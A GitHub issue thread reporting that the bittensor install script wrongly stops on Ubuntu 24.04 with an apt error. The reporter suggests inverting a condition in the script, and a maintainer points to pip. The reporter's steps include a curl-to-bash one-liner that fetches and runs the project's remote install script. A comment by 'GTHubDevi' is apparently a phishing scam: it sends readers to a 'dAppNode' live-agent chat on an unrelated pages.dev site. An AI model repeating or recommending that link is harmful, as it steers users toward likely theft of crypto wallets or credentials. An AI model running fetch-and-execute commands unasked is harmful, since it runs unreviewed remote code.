### ISSUE TITLE
error:This linux based install requires apt. To run with other distros (centos, arch, etc), you will need to manually install the requirements on Ubuntu 24.04 LTS (Noble Numbat) 

### ISSUE THREAD

**Issue by liefh** [camfairchild/bittensor#2152]
### Describe the bug

When I installed bittensor using a Bash command on Ubuntu 24.04 LTS (Noble Numbat),I encountered an error "This linux based install requires apt. To run with other distros (centos, arch, etc), you will need to manually install the requirements"

### To Reproduce

1.Copy and paste the following bash command into a terminal: 
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/opentensor/bittensor/master/scripts/install.sh)"

2. the script exited and the screen printed "This linux based install requires apt. To run with other distros (centos, arch, etc), you will need to manually install the requirements"

### Expected behavior

the script will continue exec on 24.04 LTS (Noble Numbat)

### Screenshots

![error](https://github.com/user-attachments/assets/0c025f2b-f25b-43cb-b785-e48b85696b86)

### Environment

Ubuntu  24.04 LTS (Noble Numbat)

### Additional context

Maybe line 179 in https://raw.githubusercontent.com/opentensor/bittensor/master/scripts/install.sh should be changed from 'if [[ $? == 0 ]] ; then' to 'if [[ $? != 0 ]] ; then'.

**Comment by GTHubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by thewhaleking** [comment]
Hey @liefh ,
You're welcome to submit a PR for this. Otherwise, you can also install through pip until this issue is resolved.
